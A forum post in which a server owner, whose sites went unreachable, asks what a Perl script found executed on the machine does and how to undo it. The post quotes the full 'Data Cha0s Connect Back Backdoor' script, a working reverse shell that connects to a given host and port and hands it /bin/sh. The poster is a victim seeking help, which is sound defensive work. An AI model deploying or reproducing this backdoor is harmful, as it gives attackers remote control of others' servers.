[URGENT] Data Cha0s Connect Back Backdoor

Hello

Since about 1 hour my server can not be reached anymore (websites, ...) from the outside world. All ports seem to be closed except port 22.

I have found the the following exploit has been executed once on my server:
"Data Cha0s Connect Back Backdoor"

1. What does this script do?
2. and how can I UNDO this script so my websites became available again?

I have found this script was executed like this: perl dc.pl mydomain.com 80


Thanks for helping
Genius

dc.pl
-----
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";

 

 

 

 

Top